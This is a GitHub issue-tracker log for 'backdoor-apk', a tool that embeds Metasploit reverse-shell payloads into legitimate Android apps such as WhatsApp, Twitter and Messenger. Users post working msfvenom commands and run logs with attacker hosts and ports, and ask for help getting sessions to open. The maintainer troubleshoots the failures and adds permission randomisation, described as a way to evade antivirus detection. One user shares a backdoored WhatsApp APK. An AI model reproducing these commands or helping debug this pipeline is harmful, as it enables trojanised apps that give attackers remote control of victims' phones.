[2017-04-29 00:42] lucas1400 opened #104 "Failed to recompile original project with backdoor"
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for

[2017-04-29 00:46] lucas1400 commented on #104
LOG HERE!

Running backdoor-apk at Fri Apr 28 21:37:41 BRT 2017
/usr/bin/msfvenom
/usr/bin/d2j-dex2jar
/usr/bin/unzip
/usr/bin/keytool
/usr/bin/jarsigner
/usr/bin/apktool
third-party/proguard5.3.2/lib/proguard
third-party/android-string-obfuscator/lib/aso
third-party/android-sdk-linux/build-tools/25.0.2/dx
third-party/android-sdk-linux/build-tools/25.0.2/zipalign
Archive:  com.UCMobile.intl-11.3.0

[2017-05-03 09:50] GlobalThreat commented on #104
I also had that problem.
I think it your version of dex2jar is outdated.
Try Manually installing dj2-dex2jar its also known as dex2jar 2.0.
All I did is installing TheFatrat. And the problem was fixed.
TheFatrat also uses dex2jar and it automatically update it.

On Apr 29, 2017 01:42, "lucas1400" <notifications@github.com> wrote:

[2017-05-04 16:38] moosx opened #105 "APKTOOL ERORR : Error: Unable to rebuild apk with apktool"
hey guys

help me !!

`msfvenom -x twitter.apk  -p android/meterpreter/reverse_tcp LHOST=my ip LPORT=4444 -k -o twiiterMX.apk
`

`Using APK template: twitter.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload AP

[2017-05-04 16:52] GlobalThreat commented on #105
You can only use Windows executable s with -x options

On May 4, 2017 17:38, "moosx" <notifications@github.com> wrote:

[2017-05-04 16:53] GlobalThreat commented on #105
Sorry my bad , I didn't know you can use an apk

On May 4, 2017 17:52, "Ahmed chiboub" <chiboub13@gmail.com> wrote:

[2017-05-04 21:22] moosx commented on #105
??????

[2017-05-06 04:03] moosx commented on #105
hey !!!!!!!!!!!!!!!!!!!!!

[2017-05-07 08:40] davidphoenix opened #106 "Check your environment and configuration. Couldn't find: d2j-dex2jar"
I got this error, no matter what I do:
"Check your environment and configuration. Couldn't find: d2j-dex2jar"
although I've got dex2jar and  changed its permissions (chmod +x). I can even run dex2jar via Bash, but backdoor-apk keeps showing this error. I also copied .sh files to backdoor-apk.sh path, does not work either.
any suggestions?

[2017-05-08 17:22] dana-at-cp commented on #105
Apktool has issues with some APK files in certain cases. Check with the Apktool project to see if your issue has a resolution.

[2017-05-08 17:22] #105 closed

[2017-05-08 17:24] dana-at-cp commented on #104
This is an issue with Apktool. Might be related to: #78

[2017-05-08 17:24] #104 closed

[2017-05-08 17:25] dana-at-cp commented on #106
Make sure the expected program name is in the user's path.

[2017-05-08 17:25] #106 closed

[2017-05-11 09:06] kitemmurt commented on #30
[*] Running backdoor-apk.sh v0.2.2 on gio 11 mag 2017, 10.41.29, CEST
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: intelligenc100.ddns.net
[?] Please enter an LPORT value: 1336
[+]

[2017-05-11 10:09] kitemmurt opened #107 "Problem with date and align"
[*] Running backdoor-apk.sh v0.2.2 on gio 11 mag 2017, 10.41.29, CEST
[+] Android payload options:

    meterpreter/reverse_http 4) shell/reverse_http
    meterpreter/reverse_https 5) shell/reverse_https
    meterpreter/reverse_tcp 6) shell/reverse_tcp
    [?] Please select an Android payload option: 3
    [?] Please enter an LHOST value: intelligenc100.ddns.net
    [?] Please enter an LPORT value

[2017-05-19 06:19] GHowlett commented on #105
why was this marked invalid?

[2017-05-20 11:19] ethiccode opened #108 "[!] Failed to run dx on proguard processed jar file"
![screenshot from 2017-05-20 17-04-42](https://cloud.githubusercontent.com/assets/28811396/26275364/70a96644-3d7e-11e7-8892-3d419e9ebff4.png)

[2017-05-20 11:21] ethiccode commented on #108
@dana-at-cp

[2017-05-22 17:41] Mybi commented on #52
Hi when i try your program i got this error.. continuously please solve it.. i run 32 bit kali 3

[!] Failed to align recompiled APK

[2017-05-24 17:32] dana-at-cp commented on #108
@ethiccode Are you working with a "legit" Facebook APK from the Google Play Store?

[2017-05-24 17:33] dana-at-cp commented on #107
@kitemmurt Looks like your are running zipalign on a 64 bit system without 32 bit support.

[2017-05-28 03:21] arshiay opened #109 "[!] Failed to locate smali file to hook"
hi
how fix this?

[*] Running backdoor-apk.sh v0.2.2 on Fri May 26 22:23:26 EDT 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: ************
[?] Please enter an LPORT value: 4444

[2017-05-30 05:33] jorgeclenio commented on #68
I tried installing the apt-get install dex2jar package but I could not (it could not find the package), what can I do about it?

[2017-05-30 11:10] aleemladha opened #110 "ailed to recompile original project with backdoor"
The following file failed to recompile with the backdoor
[D2D.zip](https://github.com/dana-at-cp/backdoor-apk/files/1038064/D2D.zip)

[2017-06-02 00:05] Patrickology opened #111 "Failed to locate smali file to hook"
Hi,

I tried this but it created an error:

![image](https://cloud.githubusercontent.com/assets/28252390/26705673/ea118788-4737-11e7-8a6a-adb27ef03370.png)

What's the problem here?

Thanks in advance!

[2017-06-06 10:35] gangaanonymous commented on #108
Whatever apk i choose it always come with unable to run dx....How to fix it...Plz help

[2017-06-07 04:24] #107 closed

[2017-06-07 04:25] dana-at-cp commented on #109
@arshiay Please attach the APK file you were trying to process.

[2017-06-07 04:27] dana-at-cp commented on #111
@Patrickology I'm guessing the APK file is malformed. Did the APK file come from the Google Play store?

[2017-06-07 06:09] Patrickology commented on #111
No it didn't..

[2017-06-15 14:51] dana-at-cp commented on #111
@Patrickology Please attach the APK file giving you trouble.

[2017-06-17 06:16] PunkHack commented on #111
Hi @dana-at-cp, i have the same error trying to create a backdoor in the facebook messenger.

I'm also tried whit another apk, this time was the notebok_V7 (downloaded from this page https://apkpure.com/notebook/mml.RapidNotes.android/download?from=details) and doesn't work either.
This is the error: [*] Aligning recompiled APK...done.
[!] Failed to align recompiled APK

[2017-06-17 08:28] Patrickology commented on #111
I can't even remember which apk it was, not from the Playstore anyway. No worries about it bro

[2017-06-26 17:02] dana-at-cp commented on #108
Here's the code in backdoor-apk.sh that is relevant:

[code]

[2017-06-26 17:08] dana-at-cp commented on #111
@Patrickology I reran some tests today with v0.2.2. and its working on APK files that I obtained from the Play Store.

Unofficial APK files cannot be supported since there are a number of things that could be wrong with those samples.

[2017-06-26 17:08] #111 closed

[2017-06-26 17:11] #109 closed

[2017-07-06 22:26] anonymouskillerbr1 opened #113 "[!] Failed to generate RAT APK file"
Hello have you tried using the backdoor-apk and have data the next error, [!] Failed to generate RAT APK file. I've already put the original APK in the backdoor-apk folder, backdoor-apk, and even then the error that I showed above, how can I fix this?

[2017-07-06 22:29] anonymouskillerbr1 commented on #62
Hello have you tried using the backdoor-apk and have data the next error, [!] Failed to generate RAT APK file. I've already put the original APK in the backdoor-apk folder, backdoor-apk, and even then the error that I showed above, how can I fix this?

[2017-07-06 22:29] anonymouskillerbr1 commented on #44
Hello have you tried using the backdoor-apk and have data the next error, [!] Failed to generate RAT APK file. I've already put the original APK in the backdoor-apk folder, backdoor-apk, and even then the error that I showed above, how can I fix this?

[2017-07-06 22:30] anonymouskillerbr1 commented on #71
Hello have you tried using the backdoor-apk and have data the next error, [!] Failed to generate RAT APK file. I've already put the original APK in the backdoor-apk folder, backdoor-apk, and even then the error that I showed above, how can I fix this?

[2017-07-08 03:47] sh1nta commented on #68
i have this issue Failed to run dex2jar on RAT APK file

[2017-07-17 13:03] shanmnukh commented on #62
____ _               _    _
  / ___| |__   ___  ___| | _(_)_ __   __ _
 | |   | '_ \ / _ \/ __| |/ / | '_ \ / _\ |                         | |___| | | |  __/ (__|   <| | | | | (_| |  _   _   _
  \____|_| |_|\___|\___|_|\_\_|_| |_|\__/ | (_) (_) (_)
                                        |___/
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::: Metasploit

[2017-07-17 13:03] shanmnukh commented on #62
Atruck here help

[2017-07-17 13:48] dana-at-cp commented on #113
@anonymouskillerbr1 Please share the APK file you are trying to use.

[2017-07-17 13:48] #108 closed

[2017-07-17 14:39] dana-at-cp opened #114 "Randomly order Android permissions in manifest file"
The Android permissions injected from the Metasploit payload are static and used by some mobile antivirus vendors as a detection mechanism.

In the script, merging of Android permissions from the original APK with the Metasploit payload APK should also randomly order the new set of permissions.

[2017-07-17 14:45] anonymouskillerbr1 commented on #113
I removed all the packages and installed again, it worked normal. Thank you.

2017-07-17 10:48 GMT-03:00 Dana James Traversie <notifications@github.com>:

[2017-07-17 14:48] dana-at-cp commented on #110
@aleemladha Apologies for the delay. I'll check this out today or tomorrow.

[2017-07-17 21:15] dana-at-cp commented on #113
@anonymouskillerbr1 Ok. Thanks for the update.

[2017-07-17 21:15] #113 closed

[2017-07-18 02:21] Doutianbao opened #115 "failed in recompiling"
Use 3 examples, 2 fails. what a pity.

All occur at the point:
[!] Failed to recompile original project with backdoor

The process before goes smoothly.

[2017-07-19 20:43] dana-at-cp commented on #115
@Doutianbao See anything interesting in the run.log file?

[2017-07-21 01:11] Doutianbao commented on #115
Building resources...
W: warning: string 'menu_move' has no default translation.
W: /root/tools/android/backdoor-apk/backdoor-apk/original/res/values/public.xml:165: error: invalid symbol: 'do'
W:
W: /root/tools/android/backdoor-apk/backdoor-apk/original/res/values/public.xml:386: error: invalid symbol: 'do'
W:
W: /root/tools/android/backdoor-apk/backdoor-apk/original/res/values/public.xml:563: er

[2017-07-21 01:35] Doutianbao commented on #115
#78 Maybe the same problem

[2017-07-28 20:11] Who1337 opened #116 "can't set LHOST with hostname"
[*] Running backdoor-apk.sh v0.2.2 on Sat Jul 29 02:34:24 WIB 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 1
[?] Please enter an LHOST value: example.org
[?] Please enter an LPORT value: 1337
[+] Handle the pay

[2017-07-29 03:02] Who1337 commented on #116
https://pastebin.com/axZV8BBM

[2017-07-29 03:03] Who1337 commented on #116
https://pastebin.com/raw/axZV8BBM

[2017-08-01 14:51] ngabimos commented on #57
I have also the same problem

root@kali:~/Desktop/backdoor-apk-master/backdoor-apk# ./backdoor-apk.sh uc_browser.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK

[2017-08-03 11:50] abir1937 commented on #81
[*] Running backdoor-apk.sh v0.2.2 on Thu Aug  3 17:49:43 +06 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.104
[?] Please enter an LPORT value: 4444
[+] Handle the p

[2017-08-03 11:51] abir1937 commented on #51
[*] Running backdoor-apk.sh v0.2.2 on Thu Aug  3 17:49:43 +06 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.104
[?] Please enter an LPORT value: 4444
[+] Handle the p

[2017-08-03 14:11] dana-at-cp commented on #116
@Who1337 Share the APK file you are working with please.

[2017-08-03 14:13] dana-at-cp commented on #115
@Doutianbao You are correct sir. Try other APKs. You will have better luck with APKs from the Play Store.

[2017-08-03 14:13] #115 closed

[2017-08-03 14:34] dana-at-cp commented on #110
@aleemladha The APK file you shared gets processed successfully in my environment:

[code]

[2017-08-03 14:35] dana-at-cp commented on #110
@aleemladha I used the APK file you shared:

[code]

[2017-08-03 14:35] dana-at-cp commented on #110
@aleemladha Sorry. I can't reproduce your issue.

[2017-08-03 14:35] #110 closed

[2017-08-03 15:39] alilord commented on #51
dana-at-cp help .....???

[2017-08-03 15:47] dana-at-cp commented on #51
@alilord Couple of things:

1. You should have opened a new issue instead of commenting on a closed issue.

2. Your specific error is from Apktool and appears to be a duplicate of #78

[2017-08-11 20:21] ahmeesalaar12 commented on #105
Check with the Apktool project to see if your issue has a resolution. what do you mean by this ?

[2017-08-23 00:02] #116 closed

[2017-08-26 20:03] KunalShelarKS commented on #68
same isse

[2017-09-01 11:00] bleedweedsuz opened #117 "i have weird error [./backdoor-apk.sh: line 128: $LOG_FILE: ambiguous redirect]"
root@kali:~/Desktop/backdoor-apk# ./backdoor-apk.sh FILE.apk
./backdoor-apk.sh: line 216: $LOG_FILE: ambiguous redirect
[*] Running backdoor-apk.sh v0.2.2 on Fri Sep  1 16:34:44 +0545 2017
./backdoor-apk.sh: line 128: $LOG_FILE: ambiguous redirect
[!] Check your environment and configuration. Couldn't find: msfvenom

**//i saw consult_which function in shell file if i comment on exit $rc i would g

[2017-09-12 05:10] hackerboy23 opened #118 "No session created"
Hello guys please help me everything work perfect without any error but when i start listener and open that backdoor apk no session create.

[2017-09-12 05:23] hackerboy23 commented on #118
@dana-at-cp

[2017-09-13 12:41] hackerboy23 commented on #118
reply motherfucker @dana-at-cp

[2017-09-20 03:47] dana-at-cp commented on #118
@hackerboy23 easy young padawan. What Metasploit payload are you using?

[2017-09-20 03:50] dana-at-cp commented on #117
@bleedweedsuz As the messages clearly state ... your environment/configuration is in a bad state. You are either missing dependencies required by backdoor-apk or somehow they are not in the user path.

[2017-09-20 03:51] #117 closed

[2017-09-24 09:16] madafaka255 opened #119 "[!] Failed to recompile original project with backdoor"
/ ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|_

[2017-09-24 18:39] hackerboy23 commented on #118
@dana-at-cp whenever i use reverse_tcp payload session never create

[2017-09-26 14:45] dana-at-cp commented on #118
@hackerboy23 Ok. I'll see if I can re-create the issue.

[2017-09-26 14:48] dana-at-cp commented on #119
@madafaka255 Looks like a duplicate of #78

[2017-09-26 14:48] #119 closed

[2017-09-29 02:44] henriqueyuri00 opened #120 "Falha na execução do programa"
Olá, na compilação do arquivo, esta ocorrendo um problema
![img_20170928_224717](https://user-images.githubusercontent.com/32379296/30998698-d6d6049c-a4a6-11e7-9b67-af1f3d7dba44.jpg)

[2017-09-29 16:23] srv551 commented on #30
I am getting **msfvenom** error....how to solve it ?
![screenshot 11](https://user-images.githubusercontent.com/32248262/31025485-6d47e7e2-a560-11e7-85ad-737846bcc32f.png)

[2017-10-03 17:04] virusone666 opened #121 "[!] Original APK file specified does not exist"
can any one help with this

[!] Original APK file specified does not exist

[2017-10-06 16:05] dana-at-cp commented on #121
@virusone666 Move the APK file to the directory where backdoor-apk.sh resides.

[2017-10-06 16:05] #121 closed

[2017-10-06 16:13] dana-at-cp commented on #120
@henriqueyuri00 Is this a problem? I can't reproduce. I'm guessing it has something to do with your default system language for Portugese but it's just a hunch.

[code]

[2017-10-06 23:28] henriqueyuri00 commented on #120
Qual procedimento eu poderia fazer para corrigir o problema?

[2017-10-09 22:21] dana-at-cp commented on #120
@henriqueyuri00 Here is the code that generates the RAT APK file:

[code]

Can you try to run msfvenom manually?

[code]

[2017-10-09 22:25] dana-at-cp commented on #114
Implemented randomization of permissions in the Android manifest when merged with permissions from the Metasploit payload APK. Included an option to keep the original permissions of the APK file.

New changes are in version 0.2.3 on master.

[2017-10-09 22:25] #114 closed

[2017-10-11 22:20] henriqueyuri00 commented on #120
Aparece como comando não reconhecido

[2017-10-13 20:46] brianmituka commented on #106
I'm having the same issue `./backdoor-apk.sh app-release.apk` the apk is in the same directory as the backdoor-apk.sh

[2017-10-13 21:35] brianmituka commented on #103
I'm using linux mint. How do I install dex2jar? I've already downloaded it from sourceforgenet and copied the d2j-dex2jar.sh to usr/local/sbin, but i'm still getting the error.

[2017-10-21 06:31] bani18 opened #122 "Error: unable to rebuild apk with apktool"
Help me,i got this error:

root@kali:~/Desktop# msfvenom -x flappybird-1.3.apk -p android/meterpreter/reverse_tcp LHOST=myip LPORT=4444 -o Flappy.apk
Using APK template: flappybird-1.3.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..

[2017-10-25 13:23] dana-at-cp commented on #122
@bani18 The Metasploit project is not supported here. Sorry.

[2017-10-25 13:23] #122 closed, assigned to nobody

[2017-10-25 13:25] dana-at-cp commented on #120
@henriqueyuri00 A proper installation of the Metasploit framework is a prerequisite for this project.

[2017-10-25 13:25] #120 closed

[2017-10-26 14:41] rocky2496 commented on #51
my backdoor app creating problem is
" Failed to recompile original project with backdoor"
[run.log](https://github.com/dana-at-cp/backdoor-apk/files/1418793/run.log)

please soleve  my problem

run log file
[run.log](https://github.com/dana-at-cp/backdoor-apk/files/1418798/run.log)

[2017-10-27 19:18] ghost opened #123 "[!] Failed to run dx on proguard processed jar file in Arch linux"
Hello, I would like to know which dependencies and libs to install on arch linux for the backdoor build.
I currently tested backdoor-apk on my linux mint with a tumblr apk and ran, but on the arch with the same apk it did not work.
grateful for any help.

[2017-10-28 20:01] ghost commented on #123
@dana-at-cp

[2017-10-31 01:53] rocky2496 commented on #78
please send me your backdoor  apk file

[2017-10-31 02:45] rocky2496 opened #124 "backdoor"
I'm having trouble creating a backdoor app. Please help me

[2017-11-02 09:41] #123 closed, assigned to nobody

[2017-11-10 03:13] abdozekaa opened #125 "Check your invironment and configuration"
I am running on kali nethunter and i get this issue
![screenshot_20171110-051301](https://user-images.githubusercontent.com/24819172/32641322-dd45356e-c5d5-11e7-9c06-f95bb9a113b2.png)

[2017-11-13 01:24] Sup3r-Us3r commented on #78
I'm having errors too when recompiling

[2017-11-16 23:14] dana-at-cp commented on #125
@abdozekaa I'm guessing Kali nethunter doesn't have dex2jar installed by default or it has a different name or path?

[2017-11-16 23:14] #124 closed, assigned to nobody

[2017-11-17 08:25] error-dr commented on #30
plz dana-at-cp help me
[*] Running backdoor-apk.sh v0.2.3 on Fri Nov 17 03:21:14 EST 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.15
[?] Please enter an LPORT value:

[2017-11-22 04:17] mangnik commented on #78
Got error : Failed to decompile original apk file ( both method : android manifest permission option )

[2017-11-26 16:04] abdozekaa commented on #125
Am new .. so what should i do
Am so sorry for the late

[2017-12-02 19:24] r4z0r5 commented on #125
Also note that ProGuard is now 5.3.3, the tool is still looking for 5.3.2

[2017-12-05 18:08] Nisthar commented on #110
@dana-at-cp Does it still work for you?

I am getting this error also. I think this issue with apktool is not solved yet.

Would be nice if there is a workaround for this?

[2017-12-07 10:09] Nisthar commented on #78
@dana-at-cp Is there a workaround for this issue yet?

[2017-12-08 08:23] wh001s commented on #125
Hi, I have similar issue running on kali 2.0

"Check your environment and configuration. Couldn't find: jarsigner"

even though JDK is installed java -version output is:
openjdk version "1.8.0_151"
OpenJDK Runtime Environment (build 1.8.0_151-8u151-b12-1-b12)
OpenJDK 64-Bit Server VM (build 25.151-b12, mixed mode)

kernel headers are installed

any ideas?

EDIT:
never mind, I edited the script and

[2018-01-10 09:11] HongLuDianXue commented on #125
me too...

[2018-01-16 07:57] Zyckerdsouza opened #127 "i can't decompile the following apk"
root@kali:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh whatsapp.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP

[2018-01-16 08:00] Zyckerdsouza commented on #78
seriously no one's replying to my issue ;

[2018-01-31 17:11] sivakrishnanj opened #128 "can't install the app after compile as payload"
shows in some devices: phrasing error and app not installed
i think app signature issue

[2018-02-03 06:36] rocky2496 commented on #81
meterpreter/reverse_http 4) shell/reverse_http
meterpreter/reverse_https 5) shell/reverse_https
meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.0.102
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[] Generating RAT APK file...done.
[] Decompiling RAT

[2018-02-03 06:41] rocky2496 commented on #107
[*] Running backdoor-apk.sh v0.2.2 on gio 11 mag 2017, 10.41.29, CEST
[+] Android payload options:

meterpreter/reverse_http 4) shell/reverse_http
meterpreter/reverse_https 5) shell/reverse_https
meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: intelligenc100.ddns.net
[?] Please enter an LPORT value: 1336
[+] Handle the pa

[2018-02-11 20:56] hydrahelsing commented on #103
@brianmituka  follow this
If anyone here is using linux mint follow this:
1º Get the download of dex2jar  here https://sourceforge.net/projects/dex2jar/.
2º Open your backdoor-apk.sh with gedit and search for "DEX2JAR = dex2jar" change dex2jar for the path of the file d2j-dex2jar.sh for example DEX2JAR = /home/work/dexjar/d2j-dex2jar.sh.
3º Save the file and enjoy.

[2018-03-03 09:16] SagarspTEE commented on #125
How to fix couldn't find:d2j-dex2jar on Kali Linux I have downloaded this file but I'm unable to run help me..

[2018-03-03 19:58] usama5 opened #129 "Failed to generate RAT APK file please solve this error"
[*] Running backdoor-apk.sh v0.2.3 on Sat Mar  3 14:48:41 EST 2018
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.*.*
[?] Please enter an LPORT value: 4444
[+] Android manife

[2018-03-05 20:20] Palmus84 opened #130 "Couldn't find: msfvenom"
Kali Linux 2018.1 64bit
TheFatRat v1.9.5
Metasploit v4.16.43-dev
Backdoor-apk v.0.2.3
I'll write my issue:

root@kali:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh
./backdoor-apk.sh: riga 239: $LOG_FILE: redirezione ambigua

[*] Running backdoor-apk.sh v0.2.3 on lun  5 mar 2018, 21.16.16, CET
./backdoor-apk.sh: riga 129: $LOG_FILE: redirezione ambigua
[!] Check your environment and configuration.

[2018-03-06 17:06] Palmus84 commented on #30
Hi everybody. I've the same issue of "Srv551": couldn't find msvenom (in backdoor-apk v0.2.3). Any idea for solve it? Thanks.

[2018-03-06 17:26] LinkG commented on #30
@Palmus84 make sure you have the metasploit framework installed

[2018-03-06 18:04] Palmus84 commented on #30
Yes, I checked and I've it.
(https://github.com/rapid7/metasploit-framework.wiki.git)

[2018-03-06 23:14] LinkG commented on #30
@Palmus84 you need to install it, not just clone it. For example the binaries should be in your PATH for it to work, I would recommend using a Linux distro and installing metasploit framework through their package manager

[2018-03-07 16:47] Palmus84 commented on #30
Thank you so much. I'll search the way to do it and I'try!

Palmo Baio.

________________________________
From: Niranjan <notifications@github.com>
Sent: Wednesday, March 7, 2018 12:14:17 AM
To: dana-at-cp/backdoor-apk
Cc: Palmus84; Mention
Subject: Re: [dana-at-cp/backdoor-apk] apktool errors on recompilation of original APK file (#30)

@Palmus84<https://github.com/palmus84> you need to install i

[2018-03-21 12:52] DedSecWare commented on #105
Error: Unable to rebuild apk with apktool   What to do

[2018-04-14 23:04] Djon253 opened #131 "I tried everything possible, but the error does not go away. help me please."
root@kali:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh cleanmaster.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP

[2018-04-20 07:06] Stewarddeng commented on #118
i can't work too.everything work perfect.no session create .app is good ,can connect to internet.

[2018-04-20 07:43] Stewarddeng commented on #118
https://github.com/dana-at-cp/backdoor-apk/issues/58
this you have run the whatsApp,today i try it like you.
version is 2.18.119
everything is good, i install backdoor-apk.sh generate apk later,but no session is create.
please help me.
run.log and WhatsAPP.apk(after backdoor-apk.sh) is here:
http://proxy.stewarddeng.com/index1.php
If you've downloaded,tell me please.i take it off.
i think maybe en

[2018-04-20 08:10] Stewarddeng commented on #118
my Metasploit  is good.
i have check my lhost and lport is running.i use chrome check  Metasploit ,i have  see session.
i use meterpreter/reverse_tcp

[2018-04-20 09:50] Stewarddeng commented on #118
i run it in msfvenom,finally it work,why backdoor-apk can't work.........
msfvenom --platform android -x whatsApp.apk -p android/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -o after.apk

[2018-04-26 04:39] dana-at-cp commented on #118
@Stewarddeng Thanks for the report. I've noticed some issues recently as well. I haven't had time to investigate but it's on my list.

[2018-04-26 04:42] dana-at-cp commented on #131
@Djon253 Are you working with a legit APK from the Google store? If not, there are so many things that could be wrong with the APK that it cannot be supported.

Try a known good APK and see if the problem persists.

[2018-04-26 04:43] dana-at-cp commented on #130
@Palmus84 I cannot provide support for environment issues. Sorry.

[2018-04-26 04:43] #130 closed, assigned to nobody

[2018-04-29 12:59] loveablefellow007 commented on #118
Dana

On Thu, Apr 26, 2018, 10:09 AM Dana James Traversie <
notifications@github.com> wrote:

[2018-04-30 17:11] dana-at-cp commented on #125
Can't support environment issues. Sorry.

[2018-04-30 17:11] #125 closed, assigned to nobody

[2018-05-02 02:22] #131 closed, assigned to nobody

[2018-05-02 02:23] dana-at-cp commented on #129
@usama5 Not enough information.

[2018-05-02 02:23] #129 closed, assigned to nobody

[2018-05-02 02:24] dana-at-cp commented on #128
@sivakrishnanj Need more information. What was the source of the APK?

[2018-05-02 02:24] #128 closed, assigned to nobody

[2018-05-02 02:25] dana-at-cp commented on #127
#78

[2018-05-02 02:25] #127 closed, assigned to nobody

[2018-05-02 02:27] dana-at-cp commented on #118
@Stewarddeng If you got the WhatsApp APK from the play store then this is probably related to issue: #78

If you got the APK somewhere else then I cannot help you.

[2018-05-02 02:27] #118 closed

[2018-05-02 02:31] Stewarddeng commented on #118
i got the WhatsApp APK from this: https://www.whatsapp.com/download/

[2018-05-02 02:58] dana-at-cp commented on #118
@Stewarddeng This is a duplicate of #78

Look at the end of run.log for more information. Feel free to research and contribute a fix or workaround.

[2018-05-02 06:42] sivakrishnanj commented on #128
create the app using the given steps but after app creating there facing some installation error that I before mentioned.

[2018-05-05 23:40] sailyajit opened #132 "[!] Failed to recompile original project with backdoor"
when i run the .sh as : ./backdoor-apk.sh Snapdeal.apk

The output as on the run.log file comes out...please help.
[run.log](https://github.com/dana-at-cp/backdoor-apk/files/1977182/run.log)

[2018-05-09 07:26] LinkG commented on #132
+1 same, I had gotten it to work before, but after I changed distros its not working anymore

[2018-05-09 16:30] dana-at-cp commented on #132
From your run.log file it looks like you are missing some of the 32 bit libs.

Read through the comments under issue #30

[2018-05-09 16:53] #132 closed, assigned to nobody

[2018-05-12 14:43] grimmpotter opened #133 "[!] Failed to locate smali file to hook ?? :/"
_Hello, i hope you're all doing good..
while i was trying to backdoor an apk i got this error
"" [!] Failed to locate smali file to hook ""

with facebook messenger apk
how can i fix it ? please.

Thanks in advance ~~_
![Uploading Screenshot from 2018-05-12 15-35-08.png…]()

[2018-05-14 14:37] mechaadi opened #134 "Unable to add persistence hook due to missing permission"
help me with is, I made an app with android studio today and generated a signed apk but unfortunately something is not working properly

`[*] Generating RAT APK file...done.`
`[*] Decompiling original APK file...done.`
`[*] Decompiling RAT APK file...done.`
`[*] Merging permissions of original and payload projects...done.`
`[*] Running proguard on RAT APK file...done.`
`[*] Decompiling obfuscated

[2018-05-27 17:55] tobgy opened #135 "apktool decompiles successfully, but can`t build."
Hello,
I have an issue concerning apktool in kali linux. Whenever I try to recompile without doing any changes, it gives me this error:
I: Using Apktool 2.2.2
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could no

[2018-05-27 21:49] tobgy commented on #135
any solution pls?

[2018-05-28 07:38] rootech1 commented on #105
how to fix this error
msfvenom -x /root/Desktop/Musixmatch.apk -p android/meterpreter/reverse_tcp LHOST=197.231.43.178 LPORT=6060 -o /root/Desktop/Musixmatchreload.apk

Using APK template: /root/Desktop/Musixmatch.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[] Creating signing key and keystore..
[]

